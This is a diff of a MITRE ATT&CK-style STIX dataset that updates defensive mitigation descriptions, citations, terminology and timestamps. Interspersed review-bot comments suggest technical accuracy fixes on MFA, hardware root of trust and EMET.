+ "url": "https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/",
+ "description": "Amazon. (2019, May 17). How can I secure the files in my Amazon S3 bucket?. Retrieved October 4, 2019."
+ }
+ ],
"type": "relationship",
- "modified": "2019-10-22T20:02:00.781Z",
+ "modified": "2020-07-09T14:02:05.384Z",
"created": "2019-10-05T02:15:30.002Z"
},
{
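Review bot: The description on the `+` line recommends MFA to restrict access to `cloud storage APIs`, but on the cited platform MFA gates interactive sign-in, not API calls made with long-lived access keys; programmatic access is only MFA-bound when the bucket or IAM policy conditions on an MFA-authenticated session (for example denying requests that lack `aws:MultiFactorAuthPresent`). A practitioner reading this mitigation would want that caveat, e.g. append `For programmatic access, enforce MFA through IAM or bucket policy conditions rather than relying on console MFA alone.` This is an improvement to the mitigation text rather than a defect introduced by the commit, which only fixes the citation spacing.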
@@ -153672,9 +155030,14 @@
"source_ref": "course-of-action--feff9142-e8c2-46f4-842b-bd6fb3d41157",
"target_ref": "attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7",
"relationship_type": "mitigates",
- "description": "Encrypt data stored at rest in cloud storage.(Citation:Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019) Managed encryption keys can be rotated by most providers. At a minimum, ensure an incident response plan to storage breach includes rotating the keys and test for impact on client applications.(Citation: Google Cloud Encryption Key Rotation)",
+ "description": "Encrypt data stored at rest in cloud storage.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019) Managed encryption keys can be rotated by most providers. At a minimum, ensure an incident response plan to storage breach includes rotating the keys and test for impact on client applications.(Citation: Google Cloud Encryption Key Rotation)",
"id": "relationship--55fa32b7-b9d2-4c57-9614-b7793b2770f2",
"external_references": [
+ {
+ "source_name": "Amazon S3 Security, 2019",
+ "url": "https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/",
+ "description": "Amazon. (2019, May 17). How can I secure the files in my Amazon S3 bucket?. Retrieved October 4, 2019."
+ },
{
"source_name": "Microsoft Azure Storage Security, 2019",
"url": "https://docs.microsoft.com/en-us/azure/storage/common/storage-security-guide",
@@ -153687,7 +155050,7 @@
}
],
"type": "relationship",
- "modified": "2019-10-22T20:02:00.772Z",
+ "modified": "2020-07-09T14:02:05.436Z",
"created": "2019-10-05T02:15:30.004Z"
},
{
@@ -153698,10 +155061,17 @@
"source_ref": "course-of-action--cc2399fd-3cd3-4319-8d0a-fbd6420cdaf8",
"target_ref": "attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7",
"relationship_type": "mitigates",
- "description": "Frequently check permissions on cloud storage to ensure proper permissions are set to deny open or unprivileged access to resources.(Citation:Amazon S3 Security, 2019)",
+ "description": "Frequently check permissions on cloud storage to ensure proper permissions are set to deny open or unprivileged access to resources.(Citation: Amazon S3 Security, 2019)",
"id": "relationship--e3e50d39-fa69-4fca-9353-259247dbd439",
+ "external_references": [
+ {
+ "source_name": "Amazon S3 Security, 2019",
+ "url": "https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/",
+ "description": "Amazon. (2019, May 17). How can I secure the files in my Amazon S3 bucket?. Retrieved October 4, 2019."
+ }
+ ],
"type": "relationship",
- "modified": "2019-10-22T20:02:00.783Z",
+ "modified": "2020-07-09T14:02:05.435Z",
"created": "2019-10-05T02:15:30.005Z"
},
{
@@ -153715,7 +155085,7 @@
"description": "Use access control lists on storage systems and objects.",
"id": "relationship--be61f77a-93a3-4699-b134-52b199c7b196",
"type": "relationship",
- "modified": "2019-10-22T20:02:00.789Z",
+ "modified": "2020-07-09T14:02:05.453Z",
"created": "2019-10-05T02:15:30.007Z"
},
{
@@ -154121,7 +155491,7 @@
"description": "Administrators should perform an audit of all OAuth applications and the permissions they have been granted to access organizational data. This should be done extensively on all applications in order to establish a baseline, followed up on with periodic audits of new or updated applications. Suspicious applications should be investigated and removed.",
"id": "relationship--4b5948b4-eba5-4af6-93d1-71b109167f62",
"type": "relationship",
- "modified": "2019-10-18T15:20:05.617Z",
+ "modified": "2020-07-14T19:16:31.139Z",
"created": "2019-10-08T19:55:33.729Z"
},
{
@@ -154135,7 +155505,7 @@
"description": "A Cloud Access Security Broker (CASB) can be used to set usage policies and manage user permissions on cloud applications to prevent access to application access tokens.",
"id": "relationship--d3e90e1c-b669-4909-ae44-75bfe8bf89e8",
"type": "relationship",
- "modified": "2019-10-18T15:20:05.616Z",
+ "modified": "2020-07-14T19:16:31.141Z",
"created": "2019-10-08T19:55:33.750Z"
},
{
@@ -154149,7 +155519,7 @@
"description": "Administrators can block end-user consent to OAuth applications, disabling users from authorizing third-party apps through OAuth 2.0 and forcing administrative consent for all requests. They can also block end-user registration of applications by their users, to reduce risk. A Cloud Access Security Broker can also be used to ban applications.\n\nAzure offers a couple of enterprise policy settings in the Azure Management Portal that may help:\n\n\"Users -> User settings -> App registrations: Users can register applications\" can be set to \"no\" to prevent users from registering new applications. \n\"Enterprise applications -> User settings -> Enterprise applications: Users can consent to apps accessing company data on their behalf\" can be set to \"no\" to prevent users from consenting to allow third-party multi-tenant applications",
"id": "relationship--25407fd4-3940-4446-9c17-6eebe902dbdf",
"type": "relationship",
- "modified": "2019-10-18T15:20:05.614Z",
+ "modified": "2020-07-14T19:16:31.162Z",
"created": "2019-10-08T19:55:33.752Z"
},
{
@@ -154210,7 +155580,7 @@
"description": "Ensure that applications do not store sensitive data or credentials insecurely. (e.g. plaintext credentials in code, published credentials in repositories, or credentials in public cloud storage).",
"id": "relationship--c8acdf40-8237-487f-8255-91afa327705d",
"type": "relationship",
- "modified": "2020-03-23T20:59:39.909Z",
+ "modified": "2020-06-20T22:44:36.305Z",
"created": "2019-10-10T18:46:45.553Z"
},
{
@@ -154231,7 +155601,7 @@
}
],
"type": "relationship",
- "modified": "2019-10-22T19:56:22.154Z",
+ "modified": "2020-07-14T19:17:44.658Z",
"created": "2019-10-10T19:17:52.805Z"
},
{
@@ -154860,6 +156230,27 @@
"modified": "2019-10-11T17:33:29.152Z",
"created": "2019-10-11T17:33:29.152Z"
},
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--93e7968a-9074-4eac-8ae9-9f5200ec3317",
+ "target_ref": "attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c",
+ "relationship_type": "mitigates",
+ "description": "Limit permissions for creating new instances in accordance with least privilege. Organizations should limit the number of users within the organization with an IAM role that has administrative privileges, strive to reduce all permanent privileged role assignments, and conduct periodic entitlement reviews on IAM users, roles and policies.(Citation: Mandiant M-Trends 2020)",
+ "id": "relationship--e6a74691-5e6a-49ef-b8dc-e3d9e28fe048",
+ "external_references": [
+ {
+ "source_name": "Mandiant M-Trends 2020",
+ "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
+ "description": "FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020."
+ }
+ ],
+ "type": "relationship",
+ "modified": "2020-06-18T11:45:36.669Z",
+ "created": "2019-10-11T17:48:31.883Z"
+ },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -154892,7 +156283,7 @@
"description": "Enforce the principle of least-privilege by limiting dashboard visibility to only the resources required. This may limit the discovery value of the dashboard in the event of a compromised account.",
"id": "relationship--ba2b1689-b46c-4451-9618-1c1669a0da0c",
"type": "relationship",
- "modified": "2019-10-23T14:19:37.591Z",
+ "modified": "2020-07-14T19:19:01.079Z",
"created": "2019-10-11T20:39:32.568Z"
},
{
@@ -154934,7 +156325,7 @@
}
],
"type": "relationship",
- "modified": "2019-10-22T19:59:20.647Z",
+ "modified": "2020-04-21T15:26:25.905Z",
"created": "2019-10-14T16:25:38.680Z"
},
{
@@ -154948,7 +156339,7 @@
"description": "Configure browsers or tasks to regularly delete persistent cookies.",
"id": "relationship--248a0d72-d9cd-43d3-985f-a33a49a79e8b",
"type": "relationship",
- "modified": "2019-10-22T19:59:20.658Z",
+ "modified": "2020-04-21T15:26:25.894Z",
"created": "2019-10-14T16:25:38.693Z"
},
{
@@ -154962,7 +156353,7 @@
"description": "Train users to identify aspects of phishing attempts where they're asked to enter credentials into a site that has the incorrect domain for the application they are logging into.",
"id": "relationship--f780f9d8-1baa-41b7-b7a1-acba717df0ab",
"type": "relationship",
- "modified": "2019-10-22T19:59:20.675Z",
+ "modified": "2020-04-21T15:26:25.950Z",
"created": "2019-10-14T16:25:38.695Z"
},
{
@@ -155148,7 +156539,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-25T22:47:34.297Z",
+ "modified": "2020-05-20T13:12:02.994Z",
"created": "2019-10-16T20:44:09.399Z"
},
{
@@ -155159,10 +156550,10 @@
"source_ref": "course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d",
"target_ref": "attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7",
"relationship_type": "mitigates",
- "description": "Cloud service providers support IP-based restrictions when accessing cloud resources. Consider using IP whitelisting along with user account management to ensure that data access is restricted not only to valid users but only from expected IP ranges to mitigate the use of stolen credentials to access data.",
+ "description": "Cloud service providers support IP-based restrictions when accessing cloud resources. Consider using IP allowlisting along with user account management to ensure that data access is restricted not only to valid users but only from expected IP ranges to mitigate the use of stolen credentials to access data.",
"id": "relationship--cf63b75f-564f-4713-a5b3-1f102d098e8e",
"type": "relationship",
- "modified": "2019-10-22T20:02:00.850Z",
+ "modified": "2020-07-09T14:02:05.452Z",
"created": "2019-10-17T19:25:21.088Z"
},
{
@@ -155296,7 +156687,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-25T23:49:21.906Z",
+ "modified": "2020-06-25T17:48:09.233Z",
"created": "2019-11-07T20:29:18.340Z"
},
{
@@ -155343,14 +156734,14 @@
"source_name": "TCG Trusted Platform Module"
},
{
- "url": "https://technet.microsoft.com/en-us/windows/dn168167.aspx",
- "description": "Microsoft. (n.d.). Secure the Windows 8.1 boot process. Retrieved June 11, 2016.",
+ "url": "https://docs.microsoft.com/en-us/windows/security/information-protection/secure-the-windows-10-boot-process",
+ "description": "Microsoft. (n.d.). Secure the Windows 10 boot process. Retrieved April 23, 2020.",
"source_name": "TechNet Secure Boot Process"
}
],
"description": "Use Trusted Platform Module technology and a secure or trusted boot process to prevent system integrity from being compromised. Check the integrity of the existing BIOS or EFI to determine if it is vulnerable to modification. (Citation: TCG Trusted Platform Module) (Citation: TechNet Secure Boot Process)",
"type": "relationship",
- "modified": "2019-12-19T18:49:30.382Z",
+ "modified": "2020-04-23T19:10:28.375Z",
"created": "2019-11-13T14:44:49.724Z"
},
{
@@ -155743,17 +157134,27 @@
"source_ref": "course-of-action--7da0387c-ba92-4553-b291-b636ee42b2eb",
"target_ref": "attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada",
"relationship_type": "mitigates",
- "description": "Check the integrity of the existing BIOS or EFI to determine if it is vulnerable to modification. Use Trusted Platform Module technology. (Citation: TCG Trusted Platform Module)",
+ "description": "Check the integrity of the existing BIOS or EFI to determine if it is vulnerable to modification. Use Trusted Platform Module technology. (Citation: TCG Trusted Platform Module) Move system's root of trust to hardware to prevent tampering with the SPI flash memory.(Citation: ESET LoJax Sept 2018) Technologies such as Intel Boot Guard can assist with this. (Citation: Intel Hardware-based Security Technologies)",
"id": "relationship--0ee07cbe-2ff1-4ea9-8a72-c83a67ce4bba",
"external_references": [
{
"url": "http://www.trustedcomputinggroup.org/wp-content/uploads/Trusted-Platform-Module-Summary_04292008.pdf",
"description": "Trusted Computing Group. (2008, April 29). Trusted Platform Module (TPM) Summary. Retrieved June 8, 2016.",
"source_name": "TCG Trusted Platform Module"
+ },
+ {
+ "source_name": "ESET LoJax Sept 2018",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf",
+ "description": "ESET. (2018, September). LOJAX First UEFI rootkit found in the wild, courtesy of the Sednit group. Retrieved July 2, 2019."
+ },
+ {
+ "source_name": "Intel Hardware-based Security Technologies",
+ "url": "https://www.intel.com/content/dam/www/public/us/en/documents/white-papers/security-technologies-4th-gen-core-retail-paper.pdf",
+ "description": "Intel. (2013). Intel Hardware-based Security Technologies for Intelligent Retail Devices. Retrieved May 19, 2020."
}
],
"type": "relationship",
- "modified": "2020-03-23T23:50:48.269Z",
+ "modified": "2020-05-19T21:22:38.135Z",
"created": "2019-12-19T19:43:34.924Z"
},
{
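Review bot: The new sentence in the description says moving the root of trust to hardware will `prevent tampering with the SPI flash memory`, but a hardware root of trust such as Intel Boot Guard verifies the initial boot block and refuses to boot modified firmware; it does not stop writes to the flash part. The control that actually blocks writes is the platform's SPI/BIOS write protection (as I recall, the cited ESET LoJax report attributes the successful implant to those protections being absent or misconfigured, so please confirm against the report). Suggest rewording to `Move the system's root of trust to hardware so that tampered firmware in SPI flash is detected and refused at boot.(Citation: ESET LoJax Sept 2018) Technologies such as Intel Boot Guard can assist with this and should be combined with the platform's SPI flash write protections.(Citation: Intel Hardware-based Security Technologies)`. The citation spacing is also inconsistent within the same string (`memory.(Citation:` vs `this. (Citation:`).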
@@ -155767,7 +157168,7 @@
"description": "Patch the BIOS and EFI as necessary.",
"id": "relationship--3b883930-6ab6-40df-a652-956c2524f300",
"type": "relationship",
- "modified": "2020-03-23T23:50:48.272Z",
+ "modified": "2020-05-19T21:22:38.148Z",
"created": "2019-12-19T19:43:34.928Z"
},
{
@@ -155781,7 +157182,7 @@
"description": "Prevent adversary access to privileged accounts or access necessary to perform this technique.",
"id": "relationship--49f4c3d1-25a1-49e1-af9f-80a4c2eb4bf7",
"type": "relationship",
- "modified": "2020-03-23T23:50:48.292Z",
+ "modified": "2020-05-19T21:22:38.147Z",
"created": "2019-12-19T19:43:34.930Z"
},
{
@@ -155802,7 +157203,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-23T23:50:48.305Z",
+ "modified": "2020-05-19T21:22:38.162Z",
"created": "2019-12-19T19:43:34.931Z"
},
{
@@ -155855,7 +157256,7 @@
"relationship_type": "mitigates",
"id": "relationship--5d7f29b7-4b95-425b-bb2c-7c722d6ec1aa",
"type": "relationship",
- "modified": "2020-03-23T23:43:32.488Z",
+ "modified": "2020-05-07T22:32:05.513Z",
"created": "2019-12-19T21:05:38.391Z"
},
{
@@ -155875,13 +157276,13 @@
"source_name": "TCG Trusted Platform Module"
},
{
- "url": "https://technet.microsoft.com/en-us/windows/dn168167.aspx",
- "description": "Microsoft. (n.d.). Secure the Windows 8.1 boot process. Retrieved June 11, 2016.",
+ "url": "https://docs.microsoft.com/en-us/windows/security/information-protection/secure-the-windows-10-boot-process",
+ "description": "Microsoft. (n.d.). Secure the Windows 10 boot process. Retrieved April 23, 2020.",
"source_name": "TechNet Secure Boot Process"
}
],
"type": "relationship",
- "modified": "2020-03-23T23:43:32.534Z",
+ "modified": "2020-05-07T22:32:05.515Z",
"created": "2019-12-19T21:05:38.409Z"
},
{
@@ -155895,7 +157296,7 @@
"description": "Ensure proper permissions are in place to help prevent adversary access to privileged accounts necessary to install a bootkit.",
"id": "relationship--99662840-c630-4858-8d44-331d0b31fbc1",
"type": "relationship",
- "modified": "2020-03-23T23:43:32.508Z",
+ "modified": "2020-05-07T22:32:05.506Z",
"created": "2019-12-19T21:05:38.415Z"
},
{
@@ -156633,7 +158034,7 @@
"description": "Do not allow domain administrator accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.",
"id": "relationship--8b4c2543-e2f1-4f7c-b687-d07e7a4c763c",
"type": "relationship",
- "modified": "2020-03-28T21:11:58.063Z",
+ "modified": "2020-07-15T12:43:36.498Z",
"created": "2020-01-19T16:10:15.496Z"
},
{
@@ -156647,7 +158048,7 @@
"description": "Configure access controls and firewalls to limit access to critical systems and domain controllers. Most cloud environments support separate virtual private cloud (VPC) instances that enable further segmentation of cloud systems.",
"id": "relationship--69f9daff-c253-4d99-94e6-cd2a7a9483dc",
"type": "relationship",
- "modified": "2020-03-28T21:11:58.092Z",
+ "modified": "2020-07-15T12:43:36.501Z",
"created": "2020-01-19T16:10:15.530Z"
},
{
@@ -156661,7 +158062,7 @@
"description": "Use multi-factor authentication for user and privileged accounts.",
"id": "relationship--04f19ae7-931f-4798-a609-4b64aced1da3",
"type": "relationship",
- "modified": "2020-03-28T21:11:58.114Z",
+ "modified": "2020-07-15T12:43:36.520Z",
"created": "2020-01-19T16:10:15.541Z"
},
{
@@ -156688,7 +158089,7 @@
"description": "Do not allow domain administrator accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.",
"id": "relationship--53c22ca9-b02f-4a45-adc6-cf7763a2c6a9",
"type": "relationship",
- "modified": "2020-03-23T19:49:17.670Z",
+ "modified": "2020-05-04T19:18:36.540Z",
"created": "2020-01-19T16:54:28.868Z"
},
{
@@ -156702,7 +158103,7 @@
"description": "Use multi-factor authentication for user and privileged accounts.",
"id": "relationship--e65ad45a-4862-4455-8d3c-454eb78deaeb",
"type": "relationship",
- "modified": "2020-03-23T19:49:17.680Z",
+ "modified": "2020-05-04T19:18:36.561Z",
"created": "2020-01-19T16:54:28.882Z"
},
{
@@ -156835,60 +158236,6 @@
"modified": "2020-01-22T15:11:52.138Z",
"created": "2020-01-22T15:11:52.138Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d",
- "target_ref": "attack-pattern--c2dc4e98-ce10-4af8-866f-2187e84466f4",
- "relationship_type": "mitigates",
- "description": "Mitigation of some variants of this technique could be achieved through the use of stateful firewalls, depending upon how it is implemented.",
- "id": "relationship--921949f3-388c-44ec-9abc-bdab7be52c7c",
- "type": "relationship",
- "modified": "2020-03-27T20:14:07.539Z",
- "created": "2020-01-22T20:18:17.081Z"
- },
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d",
- "target_ref": "attack-pattern--90410d1b-b01b-4fe9-9cea-c0a3427a419c",
- "relationship_type": "mitigates",
- "description": "Mitigation of some variants of this technique could be achieved through the use of stateful firewalls, depending upon how it is implemented.",
- "id": "relationship--d736cb05-a3ce-49c7-a561-0ba8796fd64b",
- "type": "relationship",
- "modified": "2020-01-22T20:26:58.238Z",
- "created": "2020-01-22T20:26:58.238Z"
- },
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "attack-pattern--90410d1b-b01b-4fe9-9cea-c0a3427a419c",
- "target_ref": "attack-pattern--c2dc4e98-ce10-4af8-866f-2187e84466f4",
- "relationship_type": "subtechnique-of",
- "id": "relationship--1c08080c-bbf4-4a8f-ae10-fb29682783cf",
- "type": "relationship",
- "modified": "2020-01-22T20:26:58.240Z",
- "created": "2020-01-22T20:26:58.240Z"
- },
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c",
- "target_ref": "attack-pattern--90410d1b-b01b-4fe9-9cea-c0a3427a419c",
- "relationship_type": "revoked-by",
- "id": "relationship--c01e8c29-3d3c-42a6-bed4-68fe299bd320",
- "type": "relationship",
- "modified": "2020-01-22T20:28:29.862Z",
- "created": "2020-01-22T20:28:29.862Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -156897,10 +158244,10 @@
"source_ref": "course-of-action--d2a24649-9694-4c97-9c62-ce7b270bf6a3",
"target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5",
"relationship_type": "mitigates",
- "description": "Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using rundll32.exe to bypass whitelisting.",
+ "description": "Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using rundll32.exe to bypass application control.",
"id": "relationship--9c7faf9b-c0ee-419f-b816-777edebd3a2a",
"type": "relationship",
- "modified": "2020-03-29T15:34:07.118Z",
+ "modified": "2020-06-20T22:31:42.235Z",
"created": "2020-01-23T18:07:00.774Z"
},
{
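Review bot: The renamed line still points operators at `Microsoft's Enhanced Mitigation Experience Toolkit (EMET)` as the way to block rundll32.exe abuse; EMET reached end of support in 2018 and its ASR functionality is now delivered as Attack Surface Reduction rules in Microsoft Defender Exploit Guard, so the terminology refresh is a good moment to refresh the product reference as well (confirm against current Microsoft documentation before changing mitigation text; the same wording recurs in the regsvr32 relationship further down). Something like `Attack Surface Reduction (ASR) rules (formerly part of Microsoft's Enhanced Mitigation Experience Toolkit, EMET) can be used to block methods of using rundll32.exe to bypass application control.` keeps the historical name while pointing at the supported feature.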
@@ -156911,10 +158258,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--4cbc6a62-9e34-4f94-8a19-5c1a11392a49",
"relationship_type": "mitigates",
- "description": "Consider using application whitelisting configured to block execution of CMSTP.exe if it is not required for a given system or network to prevent potential misuse by adversaries.",
+ "description": "Consider using application control configured to block execution of CMSTP.exe if it is not required for a given system or network to prevent potential misuse by adversaries.",
"id": "relationship--e7f93370-0bfc-417c-8811-627ab39fafca",
"type": "relationship",
- "modified": "2020-03-29T17:19:19.674Z",
+ "modified": "2020-06-20T22:34:03.422Z",
"created": "2020-01-23T18:30:11.123Z"
},
{
@@ -156928,7 +158275,7 @@
"description": "CMSTP.exe may not be necessary within a given environment (unless using it for VPN connection installation).",
"id": "relationship--fd38c0fc-72d8-4638-b6e7-1f6c5964ab5c",
"type": "relationship",
- "modified": "2020-03-29T17:19:19.690Z",
+ "modified": "2020-06-20T22:34:03.437Z",
"created": "2020-01-23T18:30:11.132Z"
},
{
@@ -156942,7 +158289,7 @@
"description": "Consider blocking download/transfer and execution of potentially uncommon file types known to be used in adversary campaigns, such as CHM files",
"id": "relationship--51c6ea7a-8978-4bd5-9cc1-7d80bb16e70b",
"type": "relationship",
- "modified": "2020-03-27T21:04:50.389Z",
+ "modified": "2020-06-20T22:32:24.753Z",
"created": "2020-01-23T18:56:39.109Z"
},
{
@@ -156953,10 +158300,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--a6937325-9321-4e2e-bb2b-3ed2d40b2a9d",
"relationship_type": "mitigates",
- "description": "Consider using application whitelisting to prevent execution of hh.exe if it is not required for a given system or network to prevent potential misuse by adversaries.",
+ "description": "Consider using application control to prevent execution of hh.exe if it is not required for a given system or network to prevent potential misuse by adversaries.",
"id": "relationship--f4702ee6-c04f-4ccb-95f3-1b40cf6c69c8",
"type": "relationship",
- "modified": "2020-03-27T21:04:50.400Z",
+ "modified": "2020-06-20T22:32:24.757Z",
"created": "2020-01-23T18:56:39.133Z"
},
{
@@ -156967,10 +158314,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--2cd950a6-16c4-404a-aa01-044322395107",
"relationship_type": "mitigates",
- "description": "Use application whitelisting configured to block execution of InstallUtil.exe if it is not required for a given system or network to prevent potential misuse by adversaries.",
+ "description": "Use application control configured to block execution of InstallUtil.exe if it is not required for a given system or network to prevent potential misuse by adversaries.",
"id": "relationship--21ce896b-e6b5-4075-8d97-6b59c269247c",
"type": "relationship",
- "modified": "2020-03-29T15:45:34.093Z",
+ "modified": "2020-06-20T22:34:46.656Z",
"created": "2020-01-23T19:09:49.092Z"
},
{
@@ -156984,7 +158331,7 @@
"description": "InstallUtil may not be necessary within a given environment.",
"id": "relationship--a6352ede-7afb-4be5-bba4-bd5c0a20bae6",
"type": "relationship",
- "modified": "2020-03-29T15:45:34.118Z",
+ "modified": "2020-06-20T22:34:46.678Z",
"created": "2020-01-23T19:09:49.097Z"
},
{
@@ -156995,10 +158342,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade",
"relationship_type": "mitigates",
- "description": "Use application whitelisting configured to block execution of mshta.exe if it is not required for a given system or network to prevent potential misuse by adversaries.",
+ "description": "Use application control configured to block execution of mshta.exe if it is not required for a given system or network to prevent potential misuse by adversaries.",
"id": "relationship--1837a0e7-d8aa-4c96-8213-7d08ceb86390",
"type": "relationship",
- "modified": "2020-03-27T21:13:45.205Z",
+ "modified": "2020-06-20T22:35:27.822Z",
"created": "2020-01-23T19:32:49.903Z"
},
{
@@ -157012,7 +158359,7 @@
"description": "Mshta.exe may not be necessary within a given environment since its functionality is tied to older versions of Internet Explorer that have reached end of life.",
"id": "relationship--98afbb05-d48e-4438-add6-df3ea9fb568c",
"type": "relationship",
- "modified": "2020-03-27T21:13:45.247Z",
+ "modified": "2020-06-20T22:35:27.839Z",
"created": "2020-01-23T19:32:49.905Z"
},
{
@@ -157026,7 +158373,7 @@
"description": "Block execution of Regsvcs.exe and Regasm.exe if they are not required for a given system or network to prevent potential misuse by adversaries.",
"id": "relationship--2d712b2d-a9a6-4efd-b37e-1219768bdde7",
"type": "relationship",
- "modified": "2020-03-29T15:50:56.991Z",
+ "modified": "2020-06-20T22:36:37.501Z",
"created": "2020-01-23T19:42:16.784Z"
},
{
@@ -157040,7 +158387,7 @@
"description": "Regsvcs and Regasm may not be necessary within a given environment.",
"id": "relationship--ce47df8d-02dc-4380-90f8-282e009ef0fe",
"type": "relationship",
- "modified": "2020-03-29T15:50:56.993Z",
+ "modified": "2020-06-20T22:36:37.504Z",
"created": "2020-01-23T19:42:16.786Z"
},
{
@@ -157051,7 +158398,7 @@
"source_ref": "course-of-action--d2a24649-9694-4c97-9c62-ce7b270bf6a3",
"target_ref": "attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab",
"relationship_type": "mitigates",
- "description": "Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block regsvr32.exe from being used to bypass whitelisting. (Citation: Secure Host Baseline EMET) Identify and block potentially malicious software executed through regsvr32 functionality by using application whitelisting (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
+ "description": "Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block regsvr32.exe from being used to bypass application control. (Citation: Secure Host Baseline EMET) Identify and block potentially malicious software executed through regsvr32 functionality by using application control (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
"id": "relationship--b0da6a37-0a54-438f-abeb-7f1dcfebaa45",
"external_references": [
{
@@ -157091,7 +158438,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-29T15:56:13.290Z",
+ "modified": "2020-06-20T22:37:33.081Z",
"created": "2020-01-23T19:52:17.661Z"
},
{
@@ -157105,7 +158452,7 @@
"description": "Restrict storage and execution of Control Panel items to protected directories, such as C:\\Windows, rather than user directories.",
"id": "relationship--2db67ddf-b414-4dc7-87ab-0846a8bd1e8e",
"type": "relationship",
- "modified": "2020-03-29T16:11:43.677Z",
+ "modified": "2020-06-20T22:33:19.040Z",
"created": "2020-01-23T19:59:52.898Z"
},
{
@@ -157116,7 +158463,7 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--4ff5d6a8-c062-4c68-a778-36fc5edd564f",
"relationship_type": "mitigates",
- "description": "Identify and block potentially malicious and unknown .cpl files by using application whitelisting (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
+ "description": "Identify and block potentially malicious and unknown .cpl files by using application control (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
"id": "relationship--98d0fca0-b3e7-4f69-b5f3-527cdd4f48c9",
"external_references": [
{
@@ -157151,7 +158498,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-29T16:11:43.704Z",
+ "modified": "2020-06-20T22:33:19.063Z",
"created": "2020-01-23T19:59:52.901Z"
},
{
@@ -157291,7 +158638,7 @@
"description": "By default, only administrators are allowed to connect remotely using WMI; restrict other users that are allowed to connect, or disallow all users from connecting remotely to WMI.",
"id": "relationship--38a350e5-634c-4dcb-8f6c-0615cdb37864",
"type": "relationship",
- "modified": "2020-03-24T14:58:13.307Z",
+ "modified": "2020-05-05T12:02:45.820Z",
